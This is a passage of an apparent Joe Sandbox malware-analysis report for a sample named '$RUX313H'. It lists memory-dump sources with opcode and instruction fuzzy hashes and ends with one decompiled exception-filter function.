                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c575b341161671801ff58642421d9a7e156dba495d7bc8af905d96577146911f
                                                                          • Instruction ID: 45801bce464d0f790c7ab3f465cef6c758d86b8590fa89db1f855961de374107
                                                                          • Opcode Fuzzy Hash: c575b341161671801ff58642421d9a7e156dba495d7bc8af905d96577146911f
                                                                          • Instruction Fuzzy Hash: 171109353006109FD324DE6AC884A57F7EAFF88624B59891DE55ACBB60CB70FC41CB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: cefd8e4b3ecbb5e885edb4f5e7d75c32a87ae50e6f62bd6cce8258bb09284365
                                                                          • Instruction ID: 6299b668b64f78096879fb84226336f03ae003fc72a5ad151061b4903bf48165
                                                                          • Opcode Fuzzy Hash: cefd8e4b3ecbb5e885edb4f5e7d75c32a87ae50e6f62bd6cce8258bb09284365
                                                                          • Instruction Fuzzy Hash: D0115B34B00215DFCB14DF64E598AAEBBB2AF49204F24C0A9D806BB361CB319C05CF94
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d4a175aff0aea5b34771df0a0ba94ea7f0e9ea5d1eb373418d78694b3f14ecd4
                                                                          • Instruction ID: 3eebffcd577d6b5853ebf146b8489fa9411729dfcb27f01ff44708af4bc56499
                                                                          • Opcode Fuzzy Hash: d4a175aff0aea5b34771df0a0ba94ea7f0e9ea5d1eb373418d78694b3f14ecd4
                                                                          • Instruction Fuzzy Hash: B7019230204620DFC324EBA5E448B66B7E6EF81614F94C86EE64A9B750DF71EC51CB54
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 86c110353cb5c8b34e780d6490a48c9c4a64e7ad327c91840e805096d3dcd1c5
                                                                          • Instruction ID: 97f4efd33de088df32dedaf78ce6fccd4c92074c8e9bb29ae40430fece9d3f0a
                                                                          • Opcode Fuzzy Hash: 86c110353cb5c8b34e780d6490a48c9c4a64e7ad327c91840e805096d3dcd1c5
                                                                          • Instruction Fuzzy Hash: EB01F77220C3C05FC316CB29D898A51BFB1DF9A214F09C0EAD899C7762C725EC16CB52
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
Memory Dump Source
• Source File: 00000001.00000002.683429465.0000000005CA0000.00000040.00000001.sdmp, Offset: 05CA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_5ca0000_$RUX313H.jbxd
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 711689fb27886d29f5eb76505f95a77052946bb81f0733b28a0c4bc2a0ade974
                                                                          • Instruction ID: fbb29aa51bdf2b5678513598106ea9a69e7e3fcd5d7c8d8c82509203f4da978c
                                                                          • Opcode Fuzzy Hash: 711689fb27886d29f5eb76505f95a77052946bb81f0733b28a0c4bc2a0ade974
                                                                          • Instruction Fuzzy Hash: 5DF03C70A00228CBCB14DB64D5597EEBAF5AB89600F64486EC402BB791CBBA5D04CBA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7ac0e963f2e394adf3dca8babe6c1a580cb3992e0aa4be772bd409dfebcfa893
                                                                          • Instruction ID: 4b88e60a0524d4040cd7a74be6a0dcbae39d3b94621d85ea4ac339a0dc522f01
                                                                          • Opcode Fuzzy Hash: 7ac0e963f2e394adf3dca8babe6c1a580cb3992e0aa4be772bd409dfebcfa893
                                                                          • Instruction Fuzzy Hash: 3BF0BE353042195B8710DAADD88094BBBE9EFC42A43548A2AE509CB350EB71EC0187A0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c59315267542c42c75962e9bd4e7a19be3248274f35d902327192fccd911c0f9
                                                                          • Instruction ID: 1a9bd1be2cb237b8bf87daf7b6d81d03f0cd6bd03ee53da70ede9cbdd029c319
                                                                          • Opcode Fuzzy Hash: c59315267542c42c75962e9bd4e7a19be3248274f35d902327192fccd911c0f9
                                                                          • Instruction Fuzzy Hash: E1F09034200A208FC324EB69E048A57B7F6EF84624B90CD6DD55A8B750DF71FC45CBA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2686a7d680b2aa99913c8775e76f081e7c3bc61e7032b13f129b74abc8ad245e
                                                                          • Instruction ID: e3fe3e717d6ae36a74cf492c7c56af1b6871f262cea1e203432c6eed488dd2fc
                                                                          • Opcode Fuzzy Hash: 2686a7d680b2aa99913c8775e76f081e7c3bc61e7032b13f129b74abc8ad245e
                                                                          • Instruction Fuzzy Hash: F3F0A7357006205B9314966BE40455BFBAAEFC6925344807FE82AD7625DF709802C794
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d27604fde1b41f7776e2c76fdc36141c64f3e6bcc1febb6cb25e5f2cbd4462a5
                                                                          • Instruction ID: af42ff58bf16c994065dae5be6bc26c291ae956bb4614f7d9f83c61513518afc
                                                                          • Opcode Fuzzy Hash: d27604fde1b41f7776e2c76fdc36141c64f3e6bcc1febb6cb25e5f2cbd4462a5
                                                                          • Instruction Fuzzy Hash: 52F0EC317042204F8340EB38A41989B7BE6EF8221039189BED50ADF321DB31EC088BE2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c61ffb179e2d470e173ea96ab9168ace29ce3e119515599dc797f2003950c67b
                                                                          • Instruction ID: eaadeab34a86d44211ee349e57ebea4f1dfe8e197ed4c6d9359bd90bd22d05d5
                                                                          • Opcode Fuzzy Hash: c61ffb179e2d470e173ea96ab9168ace29ce3e119515599dc797f2003950c67b
                                                                          • Instruction Fuzzy Hash: 96E0D8367052201BCA20A5AAA8047BFB7CECBC0672F480437E509D7740DE65CD4583A9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.683429465.0000000005CA0000.00000040.00000001.sdmp, Offset: 05CA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_5ca0000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9d690ea2dbef97e56c1d8069c84c780d4d4dc5103e859d9c9d06b4f50b16e571
                                                                          • Instruction ID: 7503e95a7ecc08c8f5fa94c0ed03232b23c0b2062ed940a0fdd937b5dac9166a
                                                                          • Opcode Fuzzy Hash: 9d690ea2dbef97e56c1d8069c84c780d4d4dc5103e859d9c9d06b4f50b16e571
                                                                          • Instruction Fuzzy Hash: 52E065313544105FC7049B5EE858E5AB7EAEFCDA25F21806AF209CB361CEA1DC018795
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 18cf3b10653c8907cc18c9a3eb68e6c59acc7adef5f719fa0358ff2781028a89
                                                                          • Instruction ID: c7ef08d753bb67fe0feb1b5fceda76a2d667af08e04f9f6659ff5970628429da
                                                                          • Opcode Fuzzy Hash: 18cf3b10653c8907cc18c9a3eb68e6c59acc7adef5f719fa0358ff2781028a89
                                                                          • Instruction Fuzzy Hash: D4F0E5B610C3501FC753C639ACA08537FEECB9617034940EBEA84DB203D625D801C365
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.683429465.0000000005CA0000.00000040.00000001.sdmp, Offset: 05CA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_5ca0000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e3c7a1e2534a1c8dc91159b12137df57b151d46e469692940c5396f8cffc99e4
                                                                          • Instruction ID: 16704970dcd27c7a6f61dada27a3fb18fe2737cccd3a76326895586900fbf89c
                                                                          • Opcode Fuzzy Hash: e3c7a1e2534a1c8dc91159b12137df57b151d46e469692940c5396f8cffc99e4
                                                                          • Instruction Fuzzy Hash: 44E080313045105F4604E75FA89485EB7EEEFCE565351407AF10DDB750DE609C0546E5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 67e0adab1bf9ad31914e0a3fb204d4557f89423ba7d9673beab9940f1109367d
                                                                          • Instruction ID: 1dbd36f835dcc2e262bc82a9b52ec2b95b1c01f735d034f4e7de8ec993edf00a
                                                                          • Opcode Fuzzy Hash: 67e0adab1bf9ad31914e0a3fb204d4557f89423ba7d9673beab9940f1109367d
                                                                          • Instruction Fuzzy Hash: 08E06D317016209F8354EB79A40488BB7E6EF86514391893ED10ADF710DF31E8088BE5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 74914bff7a7afb1c429a402569e4062ffc0a424888292ba2a4ab575a7b39eb18
                                                                          • Instruction ID: b5d9b2a95b9c4e3df0752a82019eb7c6198cb14a800dfad4ed4844c4c6549b91
                                                                          • Opcode Fuzzy Hash: 74914bff7a7afb1c429a402569e4062ffc0a424888292ba2a4ab575a7b39eb18
                                                                          • Instruction Fuzzy Hash: 48E0DFBA00C7E11BC723CB69E8243423F78DB93020F8A40DFE094CF683C65C18098361
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f64e2bed4976fc895f9c6aece74995d8762bde5152ea76092d9ad4cb5074c662
                                                                          • Instruction ID: 7d2634f2fedc235e4955dbcca33128ccce36f54cd39f8bed7dce06dc708dbfea
                                                                          • Opcode Fuzzy Hash: f64e2bed4976fc895f9c6aece74995d8762bde5152ea76092d9ad4cb5074c662
                                                                          • Instruction Fuzzy Hash: 9EE0863A3002004B8B14976AE49496FBBDADBCC2353244539E54EC3750DE74EC0287D1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 91db6397e6adc4f29f654c2a96ca8ddd1c256c17793e31add6fcca269d18f37d
                                                                          • Instruction ID: f3705f503eea57edaab7705998ccd2afae998ebaf1fe09f1381ffe76c47ac000
                                                                          • Opcode Fuzzy Hash: 91db6397e6adc4f29f654c2a96ca8ddd1c256c17793e31add6fcca269d18f37d
                                                                          • Instruction Fuzzy Hash: AFE092352057014BC7059B65E51956E7BA6AFC4206308C92AE50AC7760DF309D02CB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 151b5036fc30193f8fd4e6f32dac0b34efe7303cddab152b87f412b296875335
                                                                          • Instruction ID: 7d79e1d49cde5bb9ff8ee93e40d34355fa90a46c68707a0c26af18e540d1a739
                                                                          • Opcode Fuzzy Hash: 151b5036fc30193f8fd4e6f32dac0b34efe7303cddab152b87f412b296875335
                                                                          • Instruction Fuzzy Hash: A4E0E5352006109B8324DB1AE494C16F7E6EFC9628714C46DE91E87B68CB32FC42CB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: aabf15a0018589347227374aa4bc33d0006df65a98cf0e8d59b2a3a52775a06c
                                                                          • Instruction ID: b731eaa0848daaf6bb51d401c7388a844af057fa092ad8b77e64082b6c1bbb43
                                                                          • Opcode Fuzzy Hash: aabf15a0018589347227374aa4bc33d0006df65a98cf0e8d59b2a3a52775a06c
                                                                          • Instruction Fuzzy Hash: 08D02B736001105FC701113AAC28B5ABBADCBC5932F58042BF849C7341DE94B90282E8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6847ef8f4dec4aba30899eaa31ba2188f59237ccf5b21fd22830000950e80418
                                                                          • Instruction ID: 59a936245eb3b71a5924f9792238ab7b421d8076741a659375abd7b2d4151b9c
                                                                          • Opcode Fuzzy Hash: 6847ef8f4dec4aba30899eaa31ba2188f59237ccf5b21fd22830000950e80418
                                                                          • Instruction Fuzzy Hash: 6BE086353006155BC714A766E41986EBBEAEFC4216304C539E51BC3760DF70AC02C7D4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1f86feec9250ea8b17277eacb07216226b1000ad039cc598d5a7268a61ed5c00
                                                                          • Instruction ID: 9f1ca22f3246511915623619387ebb7de23dd7236aab797724096340b45dd544
                                                                          • Opcode Fuzzy Hash: 1f86feec9250ea8b17277eacb07216226b1000ad039cc598d5a7268a61ed5c00
                                                                          • Instruction Fuzzy Hash: C8F0F239A01218DFDB10CF90E888E88BB72FF89319F14C196E60A57265C731AD51DF40
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2df31e6370f5c8052a820a3387860ba474bc8cb084cf16d437b030b7cc54e56a
                                                                          • Instruction ID: 33898eb45547438e546fb67ec696e0a093c19e6cf15f06b1da17554314426ca7
                                                                          • Opcode Fuzzy Hash: 2df31e6370f5c8052a820a3387860ba474bc8cb084cf16d437b030b7cc54e56a
                                                                          • Instruction Fuzzy Hash: 0FE01A71A45209ABC780DFB4D99A69EBBF5EB45204F5045A9D508E3210EE715E048782
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3eed0693b18d6add18cad461d81c2f135c516088e8c7a0b48618f66a3f106214
                                                                          • Instruction ID: cf9965ec6da9521cd938133b0ca476fb5afdffdb45a31c3d3867742f7b65ed2e
                                                                          • Opcode Fuzzy Hash: 3eed0693b18d6add18cad461d81c2f135c516088e8c7a0b48618f66a3f106214
                                                                          • Instruction Fuzzy Hash: C6D0A7357106208FC3045155E40179677E9E7C8529B48042AE409C6302CDAB9C018BC4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.683429465.0000000005CA0000.00000040.00000001.sdmp, Offset: 05CA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_5ca0000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: fb8a9ff7495827c45080368705f98b94cb81b4a00a43fd2f2fd133954c7273f1
                                                                          • Instruction ID: 7effcf0cd83edaf81fa5e9e2b84ed6c9000fc6c137548b882b51ef04e6f1c50f
                                                                          • Opcode Fuzzy Hash: fb8a9ff7495827c45080368705f98b94cb81b4a00a43fd2f2fd133954c7273f1
                                                                          • Instruction Fuzzy Hash: 99E0EC3B1011149FC7419BA0D505B99BFA5AB08651B49446AE6049E634DA328955DB80
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.683429465.0000000005CA0000.00000040.00000001.sdmp, Offset: 05CA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_5ca0000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f999a3ae29fe517437d2a341ac74dd1d756b283be5ab532b271e681dccffd7ca
                                                                          • Instruction ID: 9cc9e60aafbebe923ba6711c3167fde9e8813eb6487a70b2c7a14c47c46d97e8
                                                                          • Opcode Fuzzy Hash: f999a3ae29fe517437d2a341ac74dd1d756b283be5ab532b271e681dccffd7ca
                                                                          • Instruction Fuzzy Hash: B5D05B37100214EF87026BA1D404D99BFE5BF09250345407AF6044F230DF32C851DBC4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 36c55e84d053a8be0fd061a4b9bdd87d851931f381373cc5b55b12c16d83c2c9
                                                                          • Instruction ID: 2ab92c2219bc608152f966f6e79b78e915e300794647d217c6a6d78807e0a373
                                                                          • Opcode Fuzzy Hash: 36c55e84d053a8be0fd061a4b9bdd87d851931f381373cc5b55b12c16d83c2c9
                                                                          • Instruction Fuzzy Hash: E6D02B727086A04FD300D7ACD0405413BD29B96124B0B09E4C445EF353D794CC424B65
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 92bdbdd01649f9d5c97bbc3942bd5af527e73760c5311355719faf4d50fb4dd9
                                                                          • Instruction ID: 100ceb3b17c1e408cacff0d57b50af90088fcaa5a500d6c8312e989d476c9037
                                                                          • Opcode Fuzzy Hash: 92bdbdd01649f9d5c97bbc3942bd5af527e73760c5311355719faf4d50fb4dd9
                                                                          • Instruction Fuzzy Hash: C8D01270A41109EF8740DFB8D99955EB7F5EB442047504599D408E3200EF311F009B81
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.683429465.0000000005CA0000.00000040.00000001.sdmp, Offset: 05CA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_5ca0000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5c3465a7a4ec3201437e1e1c936eb8593a53d5ef9815daa3c0f8e353d8d8f56a
                                                                          • Instruction ID: 7ebd655958363044395152ff7f817b2c2e6bf11081c61799fceca8caca4f1689
                                                                          • Opcode Fuzzy Hash: 5c3465a7a4ec3201437e1e1c936eb8593a53d5ef9815daa3c0f8e353d8d8f56a
                                                                          • Instruction Fuzzy Hash: 32D0A77130868047C214CB2C9944255FF91AB95214B28CA5FC05587791CB318C03C795
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6309012fb32a8882c9cb04d738a512ea9d2082bd94fbc7b66ceff5f3e0d8ff8b
                                                                          • Instruction ID: 139aecf55828e6a200cc5dee82dcda948de7ba6fe7a6323250e2b3efea2104b7
                                                                          • Opcode Fuzzy Hash: 6309012fb32a8882c9cb04d738a512ea9d2082bd94fbc7b66ceff5f3e0d8ff8b
                                                                          • Instruction Fuzzy Hash: 67C080353107348B83156665A41045677DDEBCD525340047FE40947701CE779C02C7C4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5ea3fb380d6aa5b5758968c139e65563763a2d27e9e539336f6e2caeb449482f
                                                                          • Instruction ID: 14833138be13b034f60fc7b66c7f5e763cac4b2339879dbcd9fb058952ac1ad3
                                                                          • Opcode Fuzzy Hash: 5ea3fb380d6aa5b5758968c139e65563763a2d27e9e539336f6e2caeb449482f
                                                                          • Instruction Fuzzy Hash: 61D0A934401220CFCF20CF5AE2EA748FBA0FB09720F248484E0048B302D7B08446CF40
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6c2f0b745bc034702db5882eeb3f79858ae765368ba11fcbc6a32979144accbf
                                                                          • Instruction ID: 97f44cf38d08819c72e3446e995f81a3bff3d34a8e66b1acab89f8df5dacfd9d
                                                                          • Opcode Fuzzy Hash: 6c2f0b745bc034702db5882eeb3f79858ae765368ba11fcbc6a32979144accbf
                                                                          • Instruction Fuzzy Hash: 9ED01235402120CBDF30DF55E1F674D3B64F301730F504550F01083215D7708A46CB56
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9f6984b6a84dbda9760aa5e0e1deff5d00f1de226f05d5762276d67afff20ee7
                                                                          • Instruction ID: 26ddcd3a68a3f1e08e0c8dc0821e6de1265f872d1cf77f57c39cfdb24c7d26c6
                                                                          • Opcode Fuzzy Hash: 9f6984b6a84dbda9760aa5e0e1deff5d00f1de226f05d5762276d67afff20ee7
                                                                          • Instruction Fuzzy Hash: CEC04C3AA140098B8F00DAC5F4554DDF771FB84229B144162D5155350186312A178B80
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Non-executed Functions

                                                                          C-Code - Quality: 100%
                                                                          			E00DF297C(struct _EXCEPTION_POINTERS* _a4) {
                                                                          
                                                                          				SetUnhandledExceptionFilter(0);
                                                                          				return UnhandledExceptionFilter(_a4);
                                                                          			}




                                                                          APIs
                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00DF3AF2,?,?,?,00000000), ref: 00DF2981
                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 00DF298A
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.673570291.0000000000DF1000.00000020.00020000.sdmp, Offset: 00DF0000, based on PE: true
                                                                          • Associated: 00000001.00000002.673560727.0000000000DF0000.00000002.00020000.sdmp
